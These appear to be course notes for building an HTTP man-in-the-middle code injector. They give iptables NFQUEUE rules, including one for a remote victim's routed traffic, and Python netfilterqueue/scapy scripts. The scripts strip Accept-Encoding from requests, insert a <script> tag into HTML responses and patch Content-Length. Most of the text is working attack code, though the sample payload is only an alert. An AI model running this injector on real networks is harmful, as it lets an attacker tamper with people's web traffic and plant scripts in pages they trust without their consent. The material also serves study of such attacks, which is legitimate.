gzip is the compression the browser advertises in its `Accept-Encoding` request header; when the server honours it, the HTML response arrives gzip-compressed.
That is why our plain-text edits would otherwise find nothing to change: the script strips `Accept-Encoding` from the request so the server sends the response uncompressed and the response body can be searched and rewritten as text.
# iptables — testing on THIS machine (its own traffic): the INPUT/OUTPUT chains see packets to/from the local host
- -RUN: iptables -I OUTPUT -j NFQUEUE --queue-num 0
- -RUN: iptables -I INPUT -j NFQUEUE --queue-num 0
# iptables — targeting a REMOTE machine whose traffic is routed through this host (IP forwarding must be enabled): only the FORWARD chain sees it
- -RUN: iptables -I FORWARD -j NFQUEUE --queue-num 0
Caveat: these rules send every packet on the chain to queue 0 with no filter. If the script is not running (or crashes) the kernel drops those packets, so either add `--queue-bypass` so traffic keeps flowing without a listener, or narrow the match (e.g. `-p tcp -m multiport --ports 80`), and delete the rules (`iptables -D …` / `iptables --flush`) when you are done.
# CODE: BASE
- #!/usr/bin/env python
- import netfilterqueue
- import scapy.all as scapy
ack_list = []  # NOTE(review): never read or written anywhere in this listing
def set_load(packet, load):
    """Swap in a new TCP payload and clear the fields scapy must recompute.

    ``IP.len``, ``IP.chksum`` and ``TCP.chksum`` are deleted rather than
    patched by hand: scapy fills a deleted field in when the packet is
    built, so the rewritten packet leaves with a correct length and
    checksums. The same (mutated) packet object is returned.
    """
    packet[scapy.Raw].load = load
    # Stale values would otherwise be serialised as-is and the receiver
    # would discard the packet as corrupt.
    stale_fields = (
        (packet[scapy.IP], "len"),
        (packet[scapy.IP], "chksum"),
        (packet[scapy.TCP], "chksum"),
    )
    for owner, field_name in stale_fields:
        delattr(owner, field_name)
    return packet
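def process_packet(packet):
    """NFQUEUE callback: dump HTTP/80 packets and pass everything through.

    Prints every TCP segment with a payload that is going to port 80
    (request) or coming from port 80 (response), then accepts the packet
    unchanged.

    The extra ``haslayer(scapy.TCP)`` check is deliberate: the iptables rule
    queues every packet on the chain, so a UDP datagram with a payload (DNS,
    for example) would otherwise raise on ``[scapy.TCP]`` before
    ``packet.accept()`` runs and that packet would never get a verdict.
    ``show()`` prints the dump itself and returns ``None``, so it is no
    longer wrapped in ``print()`` (which appended a stray ``None`` line).
    """
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw) and scapy_packet.haslayer(scapy.TCP):
        tcp = scapy_packet[scapy.TCP]
        if tcp.dport == 80:
            print("[+] Request")
            scapy_packet.show()
        elif tcp.sport == 80:
            print("[+] Responce")
            scapy_packet.show()
    # Always give a verdict, even for packets we did not look at.
    packet.accept()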
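# The queue number must match the iptables rule (``-j NFQUEUE --queue-num 0``).
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
try:
    # Blocks until interrupted; every queued packet is handed to process_packet.
    queue.run()
except KeyboardInterrupt:
    print("[-] CTRL+C detected, shutting down")
finally:
    # Release the queue on the way out. While the iptables rule is still in
    # place and nobody is bound to the queue, the kernel drops the matched
    # traffic, so remove the rule as well once the script has stopped.
    queue.unbind()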
# CODE: MODIFYING TO SEE HTTP
- The header rewriting is done with regular expressions (patterns can be tried out at https://pythex.org/).
- This is the same regex technique used earlier in the MAC changer notes.
# CODE: injector
- #!/usr/bin/env python
- import netfilterqueue
- import scapy.all as scapy
- import re
def set_load(packet, load):
    """Replace the TCP payload of *packet* with *load*.

    The IP length and the IP/TCP checksums are deleted so that scapy
    recomputes them when the packet is built; leaving the old values in
    place would ship a packet whose length and checksums no longer match
    its contents. Returns the mutated packet.
    """
    packet[scapy.Raw].load = load
    ip_hdr = packet[scapy.IP]
    tcp_hdr = packet[scapy.TCP]
    # Deleted fields are filled in again at build time.
    del ip_hdr.len, ip_hdr.chksum, tcp_hdr.chksum
    return packet
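# Bytes literals throughout: under Python 3 scapy's ``Raw.load`` is bytes and
# a str pattern/replacement against it raises TypeError (the original code
# only ran on Python 2). ``br"..."`` is accepted by both 2.7 and 3.x.
INJECTION_CODE = b"<script>alert('hello-senpaii');</script>"
# Header names are case-insensitive, hence IGNORECASE on both patterns.
_ACCEPT_ENCODING_RE = re.compile(br"Accept-Encoding:.*?\r\n", re.IGNORECASE)
# ``\d+`` rather than ``\d*``: an empty match would make int() raise.
_CONTENT_LENGTH_RE = re.compile(br"(Content-Length:\s)(\d+)", re.IGNORECASE)


def process_packet(packet):
    """NFQUEUE callback: rewrite HTTP/80 traffic passing through the queue.

    Requests (dport 80): strip the ``Accept-Encoding`` header so the server
    answers uncompressed and the response body can be edited as plain text.
    Responses (sport 80): insert INJECTION_CODE before ``</body>`` and, when
    the segment carries a ``text/html`` response header, grow the
    ``Content-Length`` value by the injected size.

    Every packet is accepted afterwards, modified or not. A packet that is
    not TCP-with-payload is passed through untouched instead of raising on
    ``[scapy.TCP]`` inside the callback, which would leave it un-verdicted.

    NOTE(review): Content-Length lives in the header segment while
    ``</body>`` is usually in a later segment of the same response, so the
    header is grown on the assumption that the injection will happen. A
    response without ``</body>``, or one that stays chunked/compressed,
    ends up announcing bytes the browser never receives. Changing segment
    sizes also leaves TCP seq/ack numbers uncompensated; in practice this
    only works for short exchanges that fit in one segment each way.
    """
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw) and scapy_packet.haslayer(scapy.TCP):
        original_load = scapy_packet[scapy.Raw].load
        load = original_load
        tcp = scapy_packet[scapy.TCP]
        if tcp.dport == 80:
            print("[+] Request")
            load = _ACCEPT_ENCODING_RE.sub(b"", load)
        elif tcp.sport == 80:
            print("[-] Response")
            scapy_packet.show()
            load = load.replace(b"</body>", INJECTION_CODE + b"</body>")
            if b"text/html" in load:
                # Rewrite only the header's own digits. A bare
                # load.replace(old_len, new_len) would also hit every other
                # occurrence of that number in the payload (dates, ETags, body).
                load = _CONTENT_LENGTH_RE.sub(
                    lambda m: m.group(1) + b"%d" % (int(m.group(2)) + len(INJECTION_CODE)),
                    load,
                    count=1,
                )
        if load != original_load:
            # bytes() builds the raw packet on both Python 2 and 3; str()
            # only did so on Python 2.
            packet.set_payload(bytes(set_load(scapy_packet, load)))
    packet.accept()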
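# Queue 0 here must be the ``--queue-num`` used in the iptables rule.
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
try:
    # Blocks for the lifetime of the attack; packets arrive via process_packet.
    queue.run()
except KeyboardInterrupt:
    print("[-] CTRL+C detected, shutting down")
finally:
    # Unbind cleanly. With the iptables rule still present and no listener on
    # the queue the kernel drops all matched traffic, so flush the rule too.
    queue.unbind()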
# THIS IS THE FINAL OUT-PUT
The regex does not decompress anything: it removes the `Accept-Encoding` header from the request so the server never gzips the response, which is what lets the plain-text `</body>` replacement insert our `<script>` (here a simple alert) into the page.
At first the alert did not fire because of the length:
injecting the code makes the body bigger than the `Content-Length` header announces (SEE IN IMG), and the browser stops reading at the declared length, so the tail containing the script was cut off.
So we match the `Content-Length` header with a second regex and rewrite its value to the original length plus the length of the injected code (the replacement should target only the header's digits, not every occurrence of that number in the payload):
new_content_length = int(content_length) + len(injection_code)